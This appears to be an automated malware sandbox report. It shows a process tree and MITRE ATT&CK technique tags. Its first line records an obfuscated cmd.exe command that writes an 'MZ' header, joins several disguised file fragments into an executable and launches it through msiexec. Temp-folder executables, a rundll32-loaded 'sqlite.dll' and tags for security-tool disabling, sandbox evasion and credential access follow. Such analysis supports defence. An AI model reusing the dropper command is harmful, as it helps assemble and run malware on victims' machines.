"C:\Windows\System32\cmd.exe" /c echo N%TIme%O>VPZp.II & EChO | set /p = "MZ" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+LAQIL0YY.POg + vCTGFFAM.2ST+ ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS
1⤵
PID:2764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" EChO "
  2⤵
  PID:1428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>KL6F.Aa_"
  2⤵
  PID:460
- C:\Windows\SysWOW64\msiexec.exe
  msiexec.exe /Y .\pUA9.FS
  2⤵
  PID:6024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3036 -ip 3036
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1304 -ip 1304
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5632 -ip 5632
1⤵
PID:6032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5648 -ip 5648
1⤵
PID:2864

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
1⤵
PID:5804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5600 -ip 5600
1⤵
PID:5792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5640 -ip 5640
1⤵
PID:1076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5776 -ip 5776
1⤵
PID:1936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5208 -ip 5208
1⤵
PID:1888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5220 -ip 5220
1⤵
PID:5352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3076 -ip 3076
1⤵
PID:1584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5128 -ip 5128
1⤵
PID:3224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 884 -ip 884
1⤵
PID:3704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5620 -ip 5620
1⤵
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5720 -ip 5720
1⤵
PID:5832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4968 -ip 4968
1⤵
PID:4524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1720 -ip 1720
1⤵
PID:5668

C:\Users\Admin\AppData\Local\Temp\418E.exe
C:\Users\Admin\AppData\Local\Temp\418E.exe
1⤵
PID:884
- C:\Users\Admin\AppData\Local\Temp\418E.exe
  C:\Users\Admin\AppData\Local\Temp\418E.exe
  2⤵
  PID:6588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4488 -ip 4488
1⤵
PID:6740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4032 -ip 4032
1⤵
PID:6868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1904 -ip 1904
1⤵
PID:6908

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:7068
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6268
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6268 -s 456
    3⤵
    - Program crash
    PID:5956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6268 -ip 6268
1⤵
PID:5704

C:\Users\Admin\AppData\Local\Temp\DEF8.exe
C:\Users\Admin\AppData\Local\Temp\DEF8.exe
1⤵
PID:6664
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6664 -s 296
  2⤵
  - Program crash
  PID:2200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6664 -ip 6664
1⤵
PID:5972

C:\Users\Admin\AppData\Local\Temp\F947.exe
C:\Users\Admin\AppData\Local\Temp\F947.exe
1⤵
PID:5868
- C:\Users\Admin\AppData\Local\Temp\F947.exe
  C:\Users\Admin\AppData\Local\Temp\F947.exe
  2⤵
  PID:5592

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Discovery

Query Registry

System Information Discovery